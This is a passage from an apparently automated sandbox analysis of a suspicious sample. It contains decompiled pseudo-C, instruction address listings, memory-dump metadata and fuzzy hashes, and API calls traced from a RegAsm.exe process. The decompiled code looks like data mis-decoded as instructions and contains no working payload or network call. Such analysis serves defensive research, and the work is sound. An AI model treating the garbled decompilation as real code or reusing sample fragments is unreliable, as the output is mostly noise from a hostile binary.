				 *0xFFFFFFFF930E251C =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x315000 =  *0x315000 + _t348;
				 *_t348 =  *_t348 + 2;
				 *((intOrPtr*)(_t404 - 0x66f07600)) =  *((intOrPtr*)(_t404 - 0x66f07600)) + 2;
				_t349 = _t348 +  *0x211e00;
				 *_t349 =  *_t349 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x00000004 =  *0x00000004 + _t349;
				 *((intOrPtr*)(_t420 + 0x21)) =  *((intOrPtr*)(_t420 + 0x21)) + 0x35;
				 *_t349 =  *_t349 + 2;
				 *_t349 =  *_t349 + 2;
				 *_t349 =  *_t349 + 0xffffff97;
				asm("adc [esp+eax], bh");
				 *[es:edi+0x21] =  *[es:edi+0x21] + 2;
				 *((intOrPtr*)(_t404 + 0x1110ad00)) =  *((intOrPtr*)(_t404 + 0x1110ad00)) + 2;
				_t350 = _t349 + 0x21aa0027;
				 *_t350 =  *_t350 + 2;
				 *_t350 =  *_t350 + 2;
				_t351 = _t420;
				_t421 = _t350;
				asm("sbb [edx], bh");
				asm("outsb");
				 *_t351 =  *_t351 + _t421;
				 *0x00000004 =  *0x00000004 + _t404;
				 *_t351 =  *_t351 & _t351;
				 *_t351 =  *_t351 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t351 =  *_t351 + _t421;
				 *0x00000025 =  *((intOrPtr*)(0x25)) + _t434;
				 *((intOrPtr*)(_t404 + 0x4e0f6400)) =  *((intOrPtr*)(_t404 + 0x4e0f6400)) + 2;
				_t422 = _t421 +  *_t351;
				 *0x00000004 =  *0x00000004 + _t404;
				 *_t351 =  *_t351 & _t351;
				 *_t351 =  *_t351 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t422 =  *_t422 + _t422;
				 *((intOrPtr*)(_t351 + 0x32)) =  *((intOrPtr*)(_t351 + 0x32)) + _t422;
				 *_t351 =  *_t351 + 2;
				 *_t351 =  *_t351 + 2;
				 *_t351 =  *_t351 + 0x23;
				_t352 = _t351 & 0x0029056a;
				_push(ds);
				 *_t352 =  *_t352 & _t352;
				 *_t352 =  *_t352 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t434 =  *_t434 + _t422;
				 *((intOrPtr*)(0x25)) =  *((intOrPtr*)(0x25)) + 0x35;
				 *((intOrPtr*)(_t404 + 0x3c254700)) =  *((intOrPtr*)(_t404 + 0x3c254700)) + 2;
				_t354 = _t352 + 0x2a + _t434;
				 *_t354 =  *_t354 & _t354;
				 *_t354 =  *_t354 + 2;
				 *((intOrPtr*)(_t404 - 0x66daaa00)) =  *((intOrPtr*)(_t404 - 0x66daaa00)) + 2;
				_t423 = _t422 +  *_t404;
				 *((intOrPtr*)(_t434 + 4)) =  *((intOrPtr*)(_t434 + 4)) + _t423;
				 *_t354 =  *_t354 + 0x6a;
				_t355 = _t354 & 0x002c057f;
				_push(ds);
				 *_t355 =  *_t355 & _t355;
				 *_t355 =  *_t355 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x21e700 =  *0x21e700 + _t423;
				 *_t355 =  *_t355 + 2;
				 *((intOrPtr*)(_t404 + 0x3c259500)) =  *((intOrPtr*)(_t404 + 0x3c259500)) + 2;
				_t356 = _t355 + 0x2d;
				_t435 = _t434 + 0x35;
				 *_t356 =  *_t356 & _t356;
				 *_t356 =  *_t356 + 2;
				 *((intOrPtr*)(_t423 + 0x6e223c18)) =  *((intOrPtr*)(_t423 + 0x6e223c18)) + _t435;
				 *0x00000004 =  *0x00000004 + _t423;
				 *0x00000004 =  *0x00000004 + _t404;
				 *_t356 =  *_t356 & _t356;
				 *_t356 =  *_t356 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x00000004 =  *0x00000004 + _t423;
				 *((intOrPtr*)(0x25)) =  *((intOrPtr*)(0x25)) + _t435;
				 *((intOrPtr*)(_t404 + 0x4e25b100)) =  *((intOrPtr*)(_t404 + 0x4e25b100)) + 2;
				 *((intOrPtr*)(4 + _t404)) =  *((intOrPtr*)(4 + _t404)) + _t356;
				 *_t356 =  *_t356 + 2;
				 *_t356 =  *_t356 + 2;
				 *0x33 =  *0x33 + 2;
				 *0x33 =  *0x33 + 2;
				_t426 = _t423 +  *0x00000004 + _t435 + _t423 +  *0x00000004 + _t435;
				_push(es);
				_t362 = _t356 & 0x0032064a &  *(_t356 & 0x0032064a);
				 *_t362 =  *_t362 + 2;
				 *((intOrPtr*)(_t426 + 0x6e223c18)) =  *((intOrPtr*)(_t426 + 0x6e223c18)) + _t435;
				 *_t443 = _t435 +  *_t443;
				 *0x33 =  *0x33 + _t404;
				 *_t362 =  *_t362 & _t362;
				 *_t362 =  *_t362 + 2;
				 *0xFFFFFFFF930E254B =  *((intOrPtr*)(0xffffffff930e254b)) + 2;
				 *_t443 = _t435 +  *_t443;
				 *_t435 = _t435 +  *_t435;
				_t363 = _t362 &  *_t362;
				 *_t363 =  *_t363 + 2;
				 *((intOrPtr*)(_t404 - 0x7cd9e600)) =  *((intOrPtr*)(_t404 - 0x7cd9e600)) + 2;
				_push(es);
				asm("aaa");
				 *((intOrPtr*)(0x33 + _t470)) =  *((intOrPtr*)(0x33 + _t470)) + _t426;
				 *_t363 =  *_t363 + 2;
				 *_t363 =  *_t363 + 2;
				_t364 = 0x33;
				_t455 = _t363;
				_t455[9] = _t435 + _t455[9];
				asm("clc");
				_push(es);
				if( *0x33 >= 2) {
					 *0x33 =  *0x33 + 2;
					 *0x33 =  *0x33 + 2;
					_t393 = _t455;
					 *0x3B075259 =  *((intOrPtr*)(0x3b075259)) + 2;
					_t393[0xd] = _t393[0xd] + _t404;
					 *0xFFFFFFFF80269833 =  *((intOrPtr*)(0xffffffff80269833)) + _t435;
					 *0x3be000 =  *0x3be000 | _t443;
					 *_t393 =  *_t393 + 2;
					 *0x0D26A433 =  *((intOrPtr*)(0xd26a433)) + _t435;
					_t404 = _t404 |  *0x33;
					 *_t443 =  *_t443 + _t426;
					_t364 = 0x33;
					_t455 = _t393;
					_t455[0x10029a] = 0x33 + _t455[0x10029a];
				}
				 *0x22 =  *0x22 + _t435;
				_t455[0x1c837bc2] = _t364 + _t455[0x1c837bc2];
				 *_t404 = _t364 +  *_t404;
				asm("sbb eax, 0x22");
				 *((intOrPtr*)(_t455 - 0x66d8f1f8)) =  *((intOrPtr*)(_t455 - 0x66d8f1f8)) + _t364;
				_t366 = _t364 +  *_t404 &  *[es:eax];
				 *_t366 =  *_t366 + _t366;
				_t455[0x689c5c2] = _t455[0x689c5c2] + _t366;
				 *((intOrPtr*)(_t366 + _t366 + 0x2e)) =  *((intOrPtr*)(_t366 + _t366 + 0x2e)) + _t366;
				_t367 = _t366 &  *_t366;
				 *_t367 =  *_t367 + _t367;
				 *((intOrPtr*)(_t455 - 0x77d8def8)) =  *((intOrPtr*)(_t455 - 0x77d8def8)) + _t367;
				_t368 = _t367 |  *(_t367 + _t367 + 0x1e);
				 *_t368 =  *_t368 & _t368;
				 *_t368 =  *_t368 + _t368;
				 *((intOrPtr*)(_t455 - 0x6cf1dae8)) =  *((intOrPtr*)(_t455 - 0x6cf1dae8)) + _t368;
				 *_t466 =  *_t466 + _t368;
				asm("aaa");
				_t369 = _t368 &  *_t368;
				 *_t369 =  *_t369 + _t369;
				 *((intOrPtr*)(_t455 - 0x72f1dae8)) =  *((intOrPtr*)(_t455 - 0x72f1dae8)) + _t369;
				_t370 = _t369 |  *_t466;
				_push(ds);
				 *_t370 =  *_t370 & _t370;
				 *_t370 =  *_t370 + _t370;
				 *((intOrPtr*)(_t455 - 0x6cf1dae8)) =  *((intOrPtr*)(_t455 - 0x6cf1dae8)) + _t370;
				 *_t443 =  *_t443 + _t370;
				_t467 = _t466 - 1;
				_t371 = _t370 &  *_t370;
				 *_t371 =  *_t371 + _t371;
				 *((intOrPtr*)(_t404 - 0x15ed5a00)) =  *((intOrPtr*)(_t404 - 0x15ed5a00)) + _t371;
				 *_t443 =  *_t443 | _t371;
				_push(ds);
				 *_t371 =  *_t371 & _t371;
				 *_t371 =  *_t371 + _t371;
				 *((intOrPtr*)(_t455 - 0x6cf1dae8)) =  *((intOrPtr*)(_t455 - 0x6cf1dae8)) + _t371;
				 *_t371 =  *_t371 + _t426;
				asm("pushad");
				_t372 = _t371 &  *_t371;
				 *_t372 =  *_t372 + _t372;
				 *((intOrPtr*)(_t404 - 0x15ed3700)) =  *((intOrPtr*)(_t404 - 0x15ed3700)) + _t372;
				 *_t372 =  *_t372 | _t426;
				_push(ds);
				 *_t372 =  *_t372 & _t372;
				 *_t372 =  *_t372 + _t372;
				 *((intOrPtr*)(_t455 - 0x6cf1dae8)) =  *((intOrPtr*)(_t455 - 0x6cf1dae8)) + _t372;
				 *_t426 =  *_t426 + _t426;
				_t373 = _t372 ^ 0x0000003f;
				 *_t373 =  *_t373 + _t373;
				 *_t373 =  *_t373 + _t373;
				 *_t373 =  *_t373 + 0xffffffe2;
				asm("adc ch, dl");
				 *_t426 =  *_t426 | _t426;
				if( *_t426 == 0) {
					 *_t373 =  *_t373 + _t373;
					 *_t373 =  *_t373 + _t373;
					_t258 = _t373;
					_t373 = _t426;
					_t426 = _t258;
					asm("sbb [edx], bh");
					asm("outsb");
					 *_t435 =  *_t435 + _t426;
					_push(ds);
					 *_t373 =  *_t373 & _t373;
					 *_t373 =  *_t373 + _t373;
					 *((intOrPtr*)(_t455 - 0x6cf1dae8)) =  *((intOrPtr*)(_t455 - 0x6cf1dae8)) + _t373;
					 *_t435 =  *_t435 + _t426;
					 *_t435 =  *_t435 & 0x00000000;
					 *_t373 =  *_t373 + 0x2f;
				}
				asm("das");
				asm("adc bl, [edx]");
				 *_t435 =  *_t435 | _t426;
				asm("adc ah, [edx]");
				 *_t373 =  *_t373 + _t373;
				 *_t373 =  *_t373 + _t373;
				 *_t373 =  *_t373 + 0x4c;
				asm("adc bh, [eax]");
				 *_t404 =  *_t404 | _t426;
				 *_t435 = _t470;
				 *_t373 =  *_t373 + _t373;
				 *_t373 =  *_t373 + _t373;
				 *_t373 =  *_t373 + 0x71;
				asm("adc bh, [ecx+0x8]");
				 *_t435 = _t435 +  *_t435;
				 *_t373 =  *_t373 + 0xffffff8e;
				asm("adc ch, [ebx+0x1e004d08]");
				 *_t373 =  *_t373 & _t373;
				 *_t373 =  *_t373 + _t373;
				 *((intOrPtr*)(_t455 - 0x6cf1dae8)) =  *((intOrPtr*)(_t455 - 0x6cf1dae8)) + _t373;
				 *_t455 =  *_t455 + _t426;
				asm("aas");
				 *_t373 =  *_t373 + _t373;
				 *_t373 =  *_t373 + _t373;
				 *_t373 =  *_t373 + 0xffffffec;
				asm("adc ecx, ecx");
				 *_t455 =  *_t455 | _t426;
				asm("pushfd");
				_t374 = _t373 &  *_t373;
				 *_t374 =  *_t374 + _t374;
				 *((intOrPtr*)(_t426 + 0x6e223c18)) =  *((intOrPtr*)(_t426 + 0x6e223c18)) + _t435;
				 *_t443 =  *_t443 + _t426;
				_push(ds);
				 *_t374 =  *_t374 & _t374;
				 *_t374 =  *_t374 + _t374;
				 *((intOrPtr*)(_t455 - 0x6cf1dae8)) =  *((intOrPtr*)(_t455 - 0x6cf1dae8)) + _t374;
				 *_t443 =  *_t443 + _t426;
				 *_t374 =  *_t374 + _t374;
				 *_t374 =  *_t374 + _t374;
				 *_t374 =  *_t374 + 0x26;
				asm("adc al, 0xc9");
				 *_t443 =  *_t443 | _t426;
				asm("int3");
				asm("aas");
				 *_t374 =  *_t374 + _t374;
				 *_t374 =  *_t374 + _t374;
				_t375 = _t455;
				_t405 = _t375 + _t404;
				asm("daa");
				 *_t405 =  *_t405 - _t426;
				_push(_t375);
				_t375[0x10] = _t375 + _t375[0x10];
				 *_t375 = _t375 +  *_t375;
				 *_t375 = _t375 +  *_t375;
				_t376 = _t374;
				asm("daa");
				_t437 =  &(_t435[0]) | _t435[0];
				asm("loopne 0x42");
				 *_t376 =  *_t376 + _t376;
				 *_t376 =  *_t376 + _t376;
				_t377 = _t375;
				_t407 = _t405 + _t376 + _t377;
				asm("daa");
				 *_t407 = _t426;
				_t378 = _t377 + _t437;
				_t428 =  *_t407 + 1;
				 *_t378 =  *_t378 + _t378;
				 *_t378 =  *_t378 + _t378;
				asm("daa");
				_t380 = _t467;
				 *_t380 =  *_t380 + _t428;
				_t438 = _t437 + 1;
				 *_t380 =  *_t380 + _t380;
				 *_t380 =  *_t380 + _t380;
				_t381 = _t378;
				asm("daa");
				asm("fisttp qword [ebx]");
				 *((intOrPtr*)(_t438 + _t381 * 2)) =  *((intOrPtr*)(_t438 + _t381 * 2)) + 0xb;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + _t381;
				 *((intOrPtr*)(0xb + _t428)) =  *((intOrPtr*)(0xb + _t428)) + _t438;
				_t383 = _t380 - 0xb;
				asm("pushfd");
				_t439 = _t438 + 1;
				 *_t383 =  *_t383 + _t383;
				 *_t383 =  *_t383 + _t383;
				asm("daa");
				_t386 = (_t381 | 0x00000060) + _t439;
				 *_t386 =  *_t386 + _t386;
				 *_t386 =  *_t386 + _t386;
				 *((intOrPtr*)(_t439 + 0x28)) =  *((intOrPtr*)(_t439 + 0x28)) + _t439;
				_pop(_t414);
				_t388 = _t383 | 0x00000064;
				 *_t388 =  *_t388 + _t388;
				 *_t388 =  *_t388 + _t388;
				 *_t388 =  *_t388 + _t388;
				_t389 = _t386;
				_t464 = _t388;
				 *((intOrPtr*)(_t389 + _t467 - 0xffffffffffffff81)) =  *((intOrPtr*)(_t389 + _t467 - 0xffffffffffffff81)) + _t414;
				_t390 = _t389 | 0x00000065;
				 *((intOrPtr*)(_t390 + 0x44)) =  *((intOrPtr*)(_t390 + 0x44)) + _t439;
				 *((intOrPtr*)(_t464 - 0x3ad75e00)) =  *((intOrPtr*)(_t464 - 0x3ad75e00)) + _t439;
				_t391 = _t390 | 0x00000068;
				 *_t464 =  *_t464 + _t414;
				 *_t391 =  *_t391 & _t391;
				 *_t391 =  *_t391 + _t391;
				 *((intOrPtr*)(_t464 - 0x6cf1dae8)) =  *((intOrPtr*)(_t464 - 0x6cf1dae8)) + _t391;
				 *_t428 =  *_t428 + _t428;
				 *_t391 =  *_t391 + _t391;
				 *_t391 =  *_t391 + _t391;
				 *_t391 =  *_t391 + 0xffffffc3;
				asm("adc al, 0x3c");
				_t392 = _t391 + 0x69;
				 *_t464 =  *_t464 + _t414;
				 *_t392 =  *_t392 & _t392;
				 *_t392 =  *_t392 + _t392;
				 *((intOrPtr*)(_t464 - 0x6cf1dae8)) =  *((intOrPtr*)(_t464 - 0x6cf1dae8)) + _t392;
				 *_t439 =  *_t439 + 0x22;
				return _t392;
			}

0x00586fb9
0x00586fb9
0x00586fb9
0x00586fbe
0x00586fc3
0x00586fc9
0x00586fca
0x00586fcb
0x00586fcd
0x00586fd3
0x00586fd7
0x00586fd9
0x00586fdb
0x00586fdd
0x00586fdf
0x00586fe5
0x00586feb
0x00586fed
0x00586fee
0x00586fef
0x00586ff1
0x00586ff3
0x00586ff4
0x00586ff5
0x00586ff7
0x00586ff9
0x00586ffa
0x00586ffb
0x00586ffd
0x00587005
0x00587006
0x00587007
0x00587009
0x00587012
0x00587013
0x00587015
0x00587017
0x00587018
0x00587019
0x0058701b
0x00587022
0x00587029
0x0058702f
0x00587032
0x00587036
0x00587037
0x00587039
0x0058703f
0x00587041
0x00587044
0x00587045
0x00587047
0x00587049
0x0058704a
0x0058704b
0x00587053
0x00587056
0x0058705c
0x0058705d
0x0058705f
0x00587066
0x0058706b
0x0058706c
0x0058706d
0x0058706f
0x0058706f
0x00587076
0x0058707d
0x00587088
0x0058708f
0x00587095
0x00587097
0x00587099
0x0058709b
0x0058709d
0x0058709f
0x0058709f
0x005870a5
0x005870ab
0x005870b3
0x005870b9
0x005870bf
0x005870c5
0x005870cb
0x005870d1
0x005870d3
0x005870d5
0x005870d8
0x005870d9
0x005870db
0x005870de
0x005870e3
0x005870e5
0x005870e7
0x005870ea
0x005870eb
0x005870ed
0x005870f0
0x005870f6
0x005870f7
0x005870fb
0x005870fc
0x00587100
0x00587101
0x00587103
0x00587105
0x0058710d
0x0058710f
0x00587111
0x00587117
0x0058711e
0x00587121
0x00587126
0x00587127
0x00587129
0x0058712a
0x00587130
0x00587136
0x00587137
0x0058713e
0x0058713f
0x00587141
0x00587145
0x00587149
0x00587150
0x00587152
0x00587156
0x00587158
0x00587158
0x00587159
0x0058715f
0x00587161
0x00587163
0x00587165
0x0058716b
0x0058716d
0x0058716f
0x00587171
0x00587173
0x00587179
0x0058717f
0x00587181
0x00587187
0x00587189
0x0058718b
0x0058718d
0x0058718f
0x00587195
0x00587197
0x00587199
0x0058719b
0x0058719d
0x005871a3
0x005871a5
0x005871a7
0x005871a9
0x005871ab
0x005871b1
0x005871b3
0x005871b9
0x005871bf
0x005871c1
0x005871c3
0x005871c5
0x005871c7
0x005871cd
0x005871cf
0x005871d1
0x005871d3
0x005871d5
0x005871db
0x005871dd
0x005871e0
0x005871e2
0x005871e4
0x005871e4
0x005871e5
0x005871e9
0x005871eb
0x005871ed
0x005871ee
0x005871f0
0x005871f2
0x005871f3
0x005871f6
0x005871f8
0x005871ff
0x00587205
0x00587209
0x0058720b
0x0058720d
0x00587213
0x00587216
0x00587219
0x0058721b
0x00587221
0x00587224
0x00587225
0x00587227
0x00587229
0x0058722f
0x00587232
0x00587233
0x00587235
0x00587237
0x0058723d
0x00587240
0x00587241
0x00587243
0x00587245
0x0058724b
0x0058724e
0x00587250
0x00587252
0x00587254
0x00587255
0x00587257
0x00587259
0x0058725c
0x0058725e
0x00587260
0x00587262
0x00587262
0x00587265
0x00587267
0x0058726d
0x0058726f
0x00587275
0x00587277
0x0058727d
0x00587283
0x00587285
0x00587287
0x00587289
0x0058728b
0x00587291
0x00587293
0x00587297
0x00587299
0x0058729f
0x005872a1
0x005872a3
0x005872a5
0x005872a7
0x005872ad
0x005872af
0x005872b7
0x005872bc
0x005872bd
0x005872c0
0x005872c2
0x005872c5
0x005872c8
0x005872ca
0x005872cc
0x005872d1
0x005872d7
0x005872d9
0x005872e0
0x005872e1
0x005872e4
0x005872eb
0x005872ed
0x005872f3
0x005872f9
0x005872fb
0x005872fc
0x005872fd
0x00587303
0x00587305
0x00587308
0x0058730a
0x0058730a
0x0058730b
0x00587312
0x00587314
0x00587316
0x00587318
0x00587318
0x00587319
0x0058731f
0x00587321
0x00587323
0x00587325
0x0058732b
0x00587331
0x00587333
0x00587339
0x0058733f
0x00587341
0x00587347
0x00587349
0x0058734c
0x0058734e
0x00587350
0x00587353
0x00587356
0x0058735d
0x00587363
0x00587368
0x0058736a
0x0058736c
0x0058736c
0x0058736d
0x00587370
0x00587371
0x00587373
0x00587375
0x00587377
0x00587379
0x0058737f
0x00587381
0x00587387
0x0058738d
0x0058738f
0x00587391
0x00587393
0x00587395
0x0058739b
0x0058739d
0x005873a0
0x005873a2
0x005873a4
0x005873a7
0x005873ac
0x005873ad
0x005873af
0x005873b1
0x005873b7
0x005873b9
0x005873bf
0x005873c7
0x005873c9
0x005873cb
0x005873cd
0x005873d3
0x005873d5
0x005873dc
0x005873df
0x005873e4
0x005873e5
0x005873e7
0x005873e9
0x005873ef
0x005873f5
0x005873f7
0x005873fd
0x005873ff
0x00587401
0x00587403
0x00587405
0x0058740b
0x0058740d
0x0058740f
0x00587411
0x00587413
0x00587419
0x0058741b
0x00587421
0x00587429
0x0058742c
0x0058742e
0x0058743a
0x0058743c
0x0058743f
0x00587446
0x00587447
0x00587449
0x0058744b
0x00587451
0x00587453
0x00587455
0x00587457
0x00587459
0x0058745f
0x00587461
0x00587463
0x00587465
0x00587467
0x0058746d
0x0058746e
0x0058746f
0x00587472
0x00587474
0x00587476
0x00587476
0x00587477
0x0058747a
0x0058747b
0x0058747e
0x00587480
0x00587482
0x00587484
0x00587485
0x0058748b
0x00587491
0x00587497
0x0058749d
0x0058749f
0x005874a5
0x005874a7
0x005874ae
0x005874ae
0x005874af
0x005874af
0x005874b5
0x005874bb
0x005874c1
0x005874c4
0x005874c9
0x005874d2
0x005874d5
0x005874d7
0x005874dd
0x005874e1
0x005874e3
0x005874e5
0x005874eb
0x005874ef
0x005874f1
0x005874f3
0x005874f9
0x005874fc
0x005874fd
0x005874ff
0x00587501
0x00587507
0x0058750a
0x0058750b
0x0058750d
0x0058750f
0x00587515
0x00587518
0x00587519
0x0058751b
0x0058751d
0x00587523
0x00587526
0x00587527
0x00587529
0x0058752b
0x00587531
0x00587534
0x00587535
0x00587537
0x00587539
0x0058753f
0x00587542
0x00587543
0x00587545
0x00587547
0x0058754d
0x00587550
0x00587552
0x00587554
0x00587556
0x00587559
0x0058755b
0x0058755e
0x00587560
0x00587562
0x00587564
0x00587564
0x00587564
0x00587565
0x00587568
0x00587569
0x0058756c
0x0058756d
0x0058756f
0x00587571
0x00587577
0x0058757a
0x00587580
0x00587580
0x00587582
0x00587583
0x00587585
0x00587588
0x0058758a
0x0058758c
0x0058758e
0x00587591
0x00587593
0x00587596
0x00587598
0x0058759a
0x0058759c
0x0058759f
0x005875a3
0x005875aa
0x005875ad
0x005875b3
0x005875b5
0x005875b7
0x005875bd
0x005875c0
0x005875c2
0x005875c4
0x005875c6
0x005875c9
0x005875cb
0x005875ce
0x005875cf
0x005875d1
0x005875d3
0x005875d9
0x005875dc
0x005875dd
0x005875df
0x005875e1
0x005875e7
0x005875ec
0x005875ee
0x005875f0
0x005875f3
0x005875f5
0x005875f8
0x005875f9
0x005875fa
0x005875fc
0x005875fe
0x005875ff
0x00587601
0x00587602
0x00587604
0x00587605
0x00587608
0x0058760a
0x0058760c
0x0058760f
0x00587611
0x00587614
0x00587616
0x00587618
0x0058761a
0x0058761b
0x0058761d
0x0058761e
0x00587621
0x00587623
0x00587624
0x00587626
0x0058762b
0x0058762e
0x0058762f
0x00587631
0x00587632
0x00587634
0x00587636
0x00587639
0x0058763a
0x0058763d
0x00587640
0x00587642
0x00587645
0x00587647
0x0058764c
0x0058764d
0x0058764e
0x00587650
0x00587655
0x00587659
0x0058765c
0x0058765e
0x00587661
0x00587664
0x00587665
0x00587667
0x0058766a
0x0058766c
0x0058766e
0x0058766e
0x0058766f
0x00587673
0x00587675
0x0058767b
0x00587681
0x00587683
0x00587685
0x00587687
0x00587689
0x0058768f
0x00587694
0x00587696
0x00587698
0x0058769b
0x0058769d
0x0058769f
0x005876a1
0x005876a3
0x005876a5
0x005876ab
0x005876ae

Memory Dump Source

Source File: 00000000.00000002.495980429.00000000004F2000.00000002.00020000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000000.00000002.495930958.00000000004F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.496225400.0000000000592000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65b4209b708aa0e69276faad58802469e7216aed52b081166d46c0fcfd692d0d
Instruction ID: bfbcbea61c4159c1d4e1e263b085120f0deb5d9a27aab7cb3bd787c5abe6ed83
Opcode Fuzzy Hash: 65b4209b708aa0e69276faad58802469e7216aed52b081166d46c0fcfd692d0d
Instruction Fuzzy Hash: DA42EC6158E3D25FD7138B744CB9586BFB0AE1312471E4ADFC0C1CB9E3E258498AD762

Uniqueness

Uniqueness Score: -1.00%

Function 027104E1, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498861965.0000000002710000.00000040.00000001.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3add449a3839f31eb16d33348f0d3e2ec559f5b8a88ba4a67227e1f8223f800
Instruction ID: eda72d0383d607c887e495ff579739a8d1f19fe9563cb5df7b5c798c18f8633e
Opcode Fuzzy Hash: d3add449a3839f31eb16d33348f0d3e2ec559f5b8a88ba4a67227e1f8223f800
Instruction Fuzzy Hash: A5D10830C20B5ACACB11EBA4D954A9DF3B1EF95300F50DB9AD4497B224EB706AD4CF91

Uniqueness

Uniqueness Score: -1.00%

Function 027104F0, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498861965.0000000002710000.00000040.00000001.sdmp, Offset: 02710000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d57229fe2f14da8cc63a4c7223b5373b5ee742bc230e882222889a9957d13e2
Instruction ID: 8f3d78c982655bd877ae17fcbcb8b3e32241015ea398b43c3bf16eab13b68114
Opcode Fuzzy Hash: 6d57229fe2f14da8cc63a4c7223b5373b5ee742bc230e882222889a9957d13e2
Instruction Fuzzy Hash: AED1F630D20B5ACACB10EBA4D954A9DF3B1EF95300F50DB9AD44937224EB706AD9CF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 3392 Parent PID: 7036 RegAsm.exeCOMMON

Executed Functions

Function 0172B6C0, Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0172B730
GetCurrentThread.KERNEL32 ref: 0172B76D
GetCurrentProcess.KERNEL32 ref: 0172B7AA
GetCurrentThreadId.KERNEL32 ref: 0172B803

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4a47bcd259ee12df2d96e3ac16d9c3c33899f0d1c43bb4bd3636cc126c769c59
Instruction ID: 362cf2ff4e162710b4a586538fb5308a53c8b7834efa1a5001cd22bbdceaaeed
Opcode Fuzzy Hash: 4a47bcd259ee12df2d96e3ac16d9c3c33899f0d1c43bb4bd3636cc126c769c59
Instruction Fuzzy Hash: A75155B49042488FDB54CFAAD588BEEBBF1BF48308F24C45AE019A7350DB749845CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0172B6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0172B730
GetCurrentThread.KERNEL32 ref: 0172B76D
GetCurrentProcess.KERNEL32 ref: 0172B7AA
GetCurrentThreadId.KERNEL32 ref: 0172B803

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c4751abc72ed91c80fb7c1e363eb129f67a583b76eef4321be8a19be922bad23
Instruction ID: 611ec13739bbabf45c75754fc9a792adf0b896a3bc1272a7b505a4428635fda7
Opcode Fuzzy Hash: c4751abc72ed91c80fb7c1e363eb129f67a583b76eef4321be8a19be922bad23
Instruction Fuzzy Hash: EF5155B49042488FDB54CFAAD588BEEBBF1BF88308F24C45AE119A7350DB749845CF61

Uniqueness

Uniqueness Score: -1.00%

Function 06B42F98, Relevance: 1.7, APIs: 1, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.507485801.0000000006B40000.00000040.00000001.sdmp, Offset: 06B40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eedac0d9cc2ee693f94ca25f26e75fd16016350913883489bbcc374fa9f54d1
Instruction ID: 4f223b37d18b6f688eefdbc706e96014109b368566806b3f5b40be440d4c7e4a
Opcode Fuzzy Hash: 4eedac0d9cc2ee693f94ca25f26e75fd16016350913883489bbcc374fa9f54d1
Instruction Fuzzy Hash: FD818AB1D042199FDB10DFAAD8807DEFBF1FF88304F14816AE815A7250DB71A945DB91

Uniqueness

Uniqueness Score: -1.00%

Function 017293E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0172962E

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 99a8f62d16aa450a6b35d439890181888d5bd39b97da8b73ecc1ebf36cb4b1f7
Instruction ID: 4f6a62b71b3d48f6b190d29a5eeed5ba9e2a7f2226b7f1460ab2ad7ca9adf515
Opcode Fuzzy Hash: 99a8f62d16aa450a6b35d439890181888d5bd39b97da8b73ecc1ebf36cb4b1f7
Instruction Fuzzy Hash: 4B712370A00B258FD724DF6AC44479BBBF1BF88208F14892ED58AD7A50DB75E816CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0172FB20, Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0172FD0A

Memory Dump Source

Source File: 00000001.00000002.498100315.0000000001720000.00000040.00000001.sdmp, Offset: 01720000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 784b24a71da276b44577026b93fe5e651b6834233cb3abe107ddcf17675e2554
Instruction ID: 915be56b712c252d7e70942eceaeafd9925dbadf79cef448feb0e2a77e4aa42d
Opcode Fuzzy Hash: 784b24a71da276b44577026b93fe5e651b6834233cb3abe107ddcf17675e2554
Instruction Fuzzy Hash: 106136B1C053889FDB15CFA9D890ACEBFB1BF49304F18815AE454AB252D734A945CF91

Uniqueness

Uniqueness Score: -1.00%

